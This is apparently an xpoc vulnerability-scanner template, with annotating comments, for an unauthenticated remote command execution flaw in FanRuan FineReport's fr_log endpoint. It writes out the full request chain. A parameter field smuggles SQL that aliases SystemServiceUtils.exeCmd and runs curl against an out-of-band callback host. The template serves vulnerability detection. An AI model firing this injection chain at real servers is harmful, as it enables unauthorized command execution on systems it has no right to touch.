漏洞描述
FOFA: app="帆软-FineReport"
# xpoc-style PoC template. The source page lost all YAML indentation;
# the nesting below is restored from the key names (info/set/rules/r0..r2).
#
# Flow as written: r0 extracts a sessionID from an unauthenticated fr_log
# request, r1 posts a parameter dialog whose TYPE value carries a
# CREATE ALIAS / CALL statement pointing at SystemServiceUtils.exeCmd, and
# r2 fetches the page content. The only real verdict is the OOB callback in
# r2 -- r0 and r1 check little more than HTTP 200 -- so without reachable
# OOB infrastructure the scan reports the target clean even when the
# earlier requests succeeded.
id: fanruan-finereport-fr-log-rce
info:
  name: 帆软 FineReport Fr Log Rce
  author: xpoc
  severity: critical
  verified: true
  # The description holds only the asset fingerprint; affected versions and
  # a fix/mitigation pointer are not stated anywhere in the template.
  description: |
    FOFA: app="帆软-FineReport"
  reference:
    - https://xz.aliyun.com/t/11064
  tags: finereport,rce
  created: 2023/06/23
set:
  # Out-of-band listener; oobHTTP is the URL the payload is expected to hit.
  oob: oob()
  oobHTTP: oob.HTTP
  # Current epoch seconds; used in r2's "_=" query parameter (looks like a
  # cache-buster -- not otherwise load-bearing as far as this template shows).
  nowtime: timestamp_second(0)
rules:
  # r0: GET with no session cookie or auth header, only fr_username=admin in
  # the query string. A 200 whose body contains "sessionID" is treated as the
  # first indicator; the sessionID is pulled out of the JSON-like body by the
  # regex below and reused by r1 and r2. From a detection standpoint this
  # endpoint/cmd pair is the earliest observable request in the chain.
  r0:
    request:
      method: GET
      path: /WebReport/ReportServer?op=fr_log&cmd=fg_errinfo&fr_username=admin
    expression: response.status == 200 && response.body.bcontains(b"sessionID")
    output:
      search: '"op=widget&widgetname=widget9&sessionID=(?P<sessionID>.*?)\",\"type".bsubmatch(response.body)'
      sessionID: search["sessionID"]
  # r1: POST to the parameters_d dialog. The expression only checks the
  # status code, so r1 "passes" even if the server rejected the parameters;
  # nothing in the response is inspected. The START_TIME/END_TIME/LIMIT
  # values appear to be filler for the dialog's required fields.
  r1:
    request:
      method: POST
      path: /WebReport/ReportServer?op=fr_dialog&cmd=parameters_d&sessionID={{sessionID}}
      body: __parameters__={"LABEL1":"TYPE:","TYPE":"6;CREATE ALIAS RUMCMD FOR \"com.fr.chart.phantom.system.SystemServiceUtils.exeCmd\";CALL RUMCMD('curl {{oobHTTP}}');select msg, trace, sinfo, logtime from fr_errrecord where 1=1","LABEL3":"START_TIME:","START_TIME":"2020-08-11 00:00","LABEL5":"END_TIME:","END_TIME":"2020-08-11 16:41","LABEL7":"LIMIT:","LIMIT":2}
    expression: response.status == 200
  # r2: page_content GET for the same session. Presumably this is the request
  # that makes the server evaluate what r1 stored -- the template does not say
  # so explicitly; confirm against the referenced write-up. The response
  # itself is ignored; oobCheck(oob, oob.ProtocolHTTP, 3) decides, and the
  # trailing 3 is presumably a wait in seconds (verify in the xpoc docs).
  r2:
    request:
      method: GET
      path: /WebReport/ReportServer?_={{nowtime}}585&__boxModel__=true&op=page_content&sessionID={{sessionID}}&pn=1
    expression: oobCheck(oob, oob.ProtocolHTTP, 3)
# All three rules must pass; r2's OOB check is the only one that asserts
# command execution rather than endpoint reachability.
expression: r0() && r1() && r2()